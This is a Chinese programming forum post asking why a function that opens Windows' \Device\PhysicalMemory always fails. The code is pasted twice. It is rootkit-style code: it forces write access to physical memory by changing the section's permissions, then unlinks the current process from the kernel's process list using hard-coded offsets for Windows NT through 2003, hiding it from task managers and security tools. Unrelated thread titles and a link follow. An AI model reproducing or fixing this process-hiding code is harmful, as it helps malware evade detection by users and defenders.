请大家分析一下,看问题出在哪里,下面是调用隐藏的方法:
BOOL HideProcessAtAll()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0) //问题出在这里,始终返回0.
{
return FALSE;
}
int f,b;
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize=sizeof(osvi);
GetVersionEx(&osvi);
//f=0x88;b=0x8c;
if(osvi.dwMajorVersion==5)
{
if(osvi.dwMinorVersion==0)//win2k
{
f=0xa0;b=0xa4;
}
else if(osvi.dwMinorVersion==1)//winxp
{
f=0x88;b=0x8c;
}
else if(osvi.dwMinorVersion==2)//win2003
{
f=0x8a;b=0x8e;
}
else return FALSE;
}
else if(osvi.dwMajorVersion==4 && osvi.dwMinorVersion==0 &&osvi.dwPlatformId==2)//NT
{
f=0x98;b=0x9c;
}
else return FALSE;
// ULONG thread=GetData((PVOID)0xFFDFF124);
// ULONG process=GetData((PVOID)(thread+0x22c)); LocateNtdllEntry( );
//打开自身句柄,这样才能在handle列表中找到自己,PROCESS 对应 ObjectTypeNum 为5
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
ULONG process=(ULONG)GetEprocessFromPid( (DWORD)GetCurrentProcessId() );
ULONG fw=GetData(PVOID(process+f));
ULONG bw=GetData(PVOID(process+b));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw); UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
} //OpenPhysicalMemory() 方法
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
} if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
BOOL HideProcessAtAll()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0) //问题出在这里,始终返回0.
{
return FALSE;
}
int f,b;
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize=sizeof(osvi);
GetVersionEx(&osvi);
//f=0x88;b=0x8c;
if(osvi.dwMajorVersion==5)
{
if(osvi.dwMinorVersion==0)//win2k
{
f=0xa0;b=0xa4;
}
else if(osvi.dwMinorVersion==1)//winxp
{
f=0x88;b=0x8c;
}
else if(osvi.dwMinorVersion==2)//win2003
{
f=0x8a;b=0x8e;
}
else return FALSE;
}
else if(osvi.dwMajorVersion==4 && osvi.dwMinorVersion==0 &&osvi.dwPlatformId==2)//NT
{
f=0x98;b=0x9c;
}
else return FALSE;
// ULONG thread=GetData((PVOID)0xFFDFF124);
// ULONG process=GetData((PVOID)(thread+0x22c)); LocateNtdllEntry( );
//打开自身句柄,这样才能在handle列表中找到自己,PROCESS 对应 ObjectTypeNum 为5
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
ULONG process=(ULONG)GetEprocessFromPid( (DWORD)GetCurrentProcessId() );
ULONG fw=GetData(PVOID(process+f));
ULONG bw=GetData(PVOID(process+b));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw); UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
} //OpenPhysicalMemory() 方法
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
} if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
解决方案 »
- 兔子党集结号吹响,仁人志士可以站起来了
- 想看了解一下linux下的C++编程,请推荐一些入门书籍
- 怪现象:第一次连接时必须关闭防火墙,连通后再启动防火墙,后面才可以正常通信
- 一个简单的问题
- 请教CListCtrl
- waveInGetPosition和waveOutGetPosition返回的是什么位置???MSDN上没有说清楚
- 看.ncl的文件要用什么浏览器?
- 在对话框里能产生一个VIEW吗?该如何实现?
- 是getchar(),还是C++的新旧标准库文件的问题?
- 单文档程序,选用了Ribbon功能区,在向导中没有选择状态栏,现在想要状态栏了怎么办?
- 快来拿分了---《TCP\IP协议及网络编程技术》一书中的网络监视器可以从哪里下载?????
- 程序运行中如何改变PUSHBUTTON的使能禁能属性?
http://www.vckbase.com/document/viewdoc/?id=1496